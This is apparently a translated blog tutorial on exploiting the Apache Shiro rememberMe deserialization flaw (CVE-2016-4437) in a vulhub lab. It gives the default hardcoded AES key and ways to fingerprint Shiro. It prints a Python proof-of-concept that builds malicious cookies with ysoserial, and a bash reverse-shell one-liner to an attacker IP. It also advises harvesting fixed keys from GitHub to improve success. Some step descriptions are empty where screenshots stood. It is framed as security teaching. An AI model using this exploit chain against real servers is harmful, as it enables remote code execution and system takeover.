1. Introduction to shiro framework:
Apache Shiro is a powerful and easy-to-use Java security framework that can be used for authentication, authorization, encryption and session management. As long as rememberMe's AES encryption key is leaked, no matter what version of shiro it is, it will lead to a deserialization vulnerability. With Shiro's easy-to-understand API, you can quickly and easily get any app - from the smallest mobile app to the largest web and enterprise app.
2. Shiro vulnerability principle:
The Apache Shiro framework provides the function of remembering me (RemeberMe). After the user logs in successfully, an encrypted and encoded cookie will be generated. The key of the cookie is RemeberMe, and the value of the cookie is formed by serializing relevant information, then encrypting it with aes, and finally encoding it with base64.
When receiving the cookie value on the server side, follow the steps below to parse it:
Retrieve the value of the RemeberMe cookie
Base64 decoding
Decrypt using ACE (encryption key is hardcoded)
Perform deserialization (without filtering)
Because no filtering is performed when calling deserialization, remote code execution vulnerabilities can be triggered.
After the user successfully logs in, an encrypted and encoded cookie will be generated. After receiving the cookie value on the server side, Base64 decoding --> AES decryption --> deserialization.
Therefore, as long as the attacker finds the AES encryption key, he can construct a malicious object, serialize it --> AES encryption --> Base64 encoding, and then send it as the rememberMe field of the cookie, and Shiro will decrypt the rememberMe And deserialization, eventually resulting in a deserialization vulnerability.
3. Shiro serialization utilization conditions
Due to the use of AES encryption, if you want to successfully exploit the vulnerability, you need to obtain the AES encryption key. However, in versions before shiro1.2.4, it is hard-coded, and the AES encryption key is in the code by default. The base64-encoded value of the default key is kPH+bIxk5D2deZiIxcaaaA==, here you can construct a malicious serialized object to encode, encrypt, and then encrypt and send it as a cookie. After receiving it, the server will decrypt it and trigger the deserialization vulnerability .
At present, many versions have been updated, but the official did not solve the deserialization vulnerability itself, but solved the vulnerability by removing the hard-coded key and making it generate a key each time. However, at present, some open source systems and tutorial sample codes use fixed codes, and many open source projects have integrated shiro internally and developed them for secondary development, which may reproduce the risk of the default fixed key of lower versions of shiro. For example, Shiro is integrated into the Guns open source framework for secondary development. The author customizes the key and fixes it. At this time, if the user does not modify the key, even if the Shiro version is upgraded, there is still the risk of fixing the key. Here you can collect keys through search engines and github to improve the success rate of vulnerability detection and utilization.
If there is a magic function in the deserialized object, using the unserialize() function will also trigger it. In this way, once we can control the unserialize() entry, it may lead to object injection vulnerabilities.
4. Shiro Vulnerability Fingerprint
Assign any value to the rememberMe field in the Cookie of the request packet, and set-Cookie exists in the return packet: rememberMe=deleteMe
There is shiro in the URL
Sometimes the server will not take the initiative to return rememberMe=deleteMe, just send the package directly
5. Shooting range construction
We need to prepare a virtual machine, which must be equipped with docker. This virtual machine is the target machine, and then use docker to pull the vulhub shooting range. Take the CVE-2016-4437 vulnerability in the vulhub shooting range as an example, docker Installation tutorial and range pull tutorial: Vulhub - Docker-Compose file for vulnerability environment
6. Vulnerability attack
- You can use the shiro deserialization tool to find the key attack:
- You can also construct poc by yourself or search for poc on the Internet. Tools will be attached at the end of the article. First,
install the python environment. This poc script involves two third-party libraries that need to be installed by yourself:pip installrequests pip install -ihttps://pypi.douban.com/simplepycryptodome
After the installation is complete, you can use poc to construct a malicious payload:
import sys import uuid import base64 import subprocess from Crypto.Cipher import AES def encode_rememberme(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-BETA-all.jar','JRMPClient', command], stdout=subprocess.PIPE) //这里使用了ysoserial工具包,它**了各种java反序列化payload,主要有CommonsCollections1-5、JRMPClient等模块 BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) %BS)).encode() key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") iv = uuid.uuid4().bytes encryptor = AES.new(key, AES.MODE_CBC, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext if __name__ == '__main__': payload = encode_rememberme(sys.argv[1]) print"rememberMe={0}".format(payload.decode())
Target ip: 192.168.23.168
Attack ip: 192.168.23.193
bash -i>& /dev/tcp/192.168.99.174/2333 0>&1
Because the java environment does not support pipe characters, input and output redirection, etc., we need to code in advance through Java Runtime with bash:
-
Here we use the JRMPClient module to construct cookies for malicious commands:
-
Listen to port 2333 on the attacking machine:
-
After the rebound shell is processed and sent to the target machine, the CommonsCollections2 module needs to be used here:
-
Replace the malicious cookie value generated above with the rememberMe after the target website captures the package, and then release the package:
-
Check the attacking machine, and the shell has been obtained:
7. Reference tools and literature
Link: https://pan.baidu.com/s/1nCdPc0RarG9YZIVb_a-E9w
Extraction code: hn6o
8. Disclaimer
The procedures (methods) involved in the article may be offensive, and are only used for security research and teaching. If readers use their information for other purposes, the user shall bear all legal and joint liabilities, and the author of the article shall not bear any legal and joint liabilities.